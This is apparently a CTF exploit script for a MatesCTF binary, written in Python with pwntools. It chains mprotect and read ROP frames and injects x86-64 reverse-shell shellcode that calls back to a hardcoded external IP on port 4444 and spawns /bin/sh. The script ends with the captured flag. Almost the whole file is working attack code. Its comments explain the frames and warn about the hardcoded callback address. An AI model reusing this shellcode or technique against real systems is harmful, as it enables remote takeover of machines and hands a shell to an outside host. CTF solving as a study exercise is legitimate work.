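#!/usr/bin/env python
"""MatesCTF exploit script for ./get_binary (author's solve, lightly cleaned up).

Three buffers are concatenated and written to ./get_ol, after which the script
drops into an interactive session with the spawned target:

  p         - a 0x64-byte frame: a 4-byte 0x0f marker followed by 12 qwords.  The
              run 0xa, 0x400000, 0x1000, 0x7 reads like the arguments of
              mprotect(0x400000, 0x1000, PROT_RWX) (0xa is the x86-64 mprotect
              number), with 0x400500/0x100 presumably a buffer/length pair for a
              read -- TODO confirm how the target actually consumes this frame.
  x         - a second 0x64-byte frame (0x400374 with a 0x200 argument), presumably
              the step that pulls the 0x200-byte shellcode block in.
  shellcode - 0x200 bytes: 0x34 NOPs, a return target (0x40055c), 8 NOPs, then an
              x86-64 reverse shell (socket -> connect -> dup2 x3 -> execve
              "/bin/sh" with NULL argv/envp).

NOTE(review): nothing is ever sent to the target's stdin -- the payload only
lands in ./get_ol, so the target is presumably reading that file; confirm.

Bytes literals are used throughout so the script also runs under Python 3
pwntools (the original str literals could not be concatenated with p64()'s
bytes there, and could not be written to a file opened "wb").
"""
from pwn import *

# Configure the context before spawning the target so the debug log covers
# the spawn itself and p32/p64 below pack for amd64 little-endian.
context.clear()
context.arch = "amd64"
context.log_level = "debug"
context.endian = "little"

io = process("./get_binary")


def _pad(buf, size, fill):
    """Right-pad *buf* with *fill* to exactly *size* bytes.

    A plain ``fill * (size - len(buf))`` silently yields an empty string once
    the payload outgrows its slot, which would shift every offset after it;
    raise instead so the mistake is caught while the exploit is being built.
    """
    if len(buf) > size:
        raise ValueError("payload is %d bytes but its slot is %d bytes" % (len(buf), size))
    return buf + fill * (size - len(buf))


# Reverse-shell callback.  These are the raw bytes the shellcode pokes into the
# sockaddr_in on the stack, i.e. already in network byte order:
#   host 0x675c1cd3 -> 103.92.28.211, port 0x115c -> 4444
# SECURITY: running this unchanged hands a root-of-the-target shell to that
# address; point it at your own listener first.
host = p32(0x675c1cd3)[::-1]
port = b"\x11\x5c"

# Shellcode slot layout: 0x34-byte NOP sled, the return target 0x40055c
# (presumably the overwritten saved RIP), 8 more NOPs, then the reverse shell.
# The reverse shell decodes to: socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
# build sockaddr_in {2, port, host} on the stack; connect(); dup2(sock, 2/1/0)
# in a loop; execve("/bin/sh", NULL, NULL).
shellcode = b"\x90" * 0x34 + p64(0x40055c) + b"\x90" * 8
shellcode += b"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
shellcode += b"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
shellcode += b"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
shellcode += b"\x02" + port + b"\xc7\x44\x24\x04" + host + b"\x48\x89\xe6\x6a\x10"
shellcode += b"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
shellcode += b"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
shellcode += b"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
shellcode += b"\x5f\x6a\x3b\x58\x0f\x05"
shellcode = _pad(shellcode, 0x200, b"\x90")

# Addresses inside the 0x400000-based binary (looks non-PIE; confirm).
syscall = 0x400364  # recorded by the author; not referenced below (x uses 0x400374)
read = 0x4002BB

# First frame -- see the module docstring for what the qwords appear to be.
p = b"\x0f\x00\x00\x00"
p += p64(0x400520 + 4)
p += p64(0x400350)
p += p64(read)
p += p64(0xa)
p += p64(0x400000)
p += p64(0x1000)
p += p64(0x7)
p += p64(0x400500)
p += p64(0x100)
p += p64(0) * 3
p = _pad(p, 0x64, b"\x90")

# gdb.attach(io)  # debug hook: uncomment to attach before the target consumes ./get_ol

# Second frame.
x = b"\x90" * 4
x += p64(0x400520 + 4)
x += p64(0x400374)
x += p64(0x200)
x += p64(0) * 3
x = _pad(x, 0x64, b"A")

with open("./get_ol", "wb") as f:
    f.write(p + x + shellcode)
io.interactive()
# MatesCTF{why_4m_1_s0_0bs3ss3d_w1th_bl1nd_RC3?}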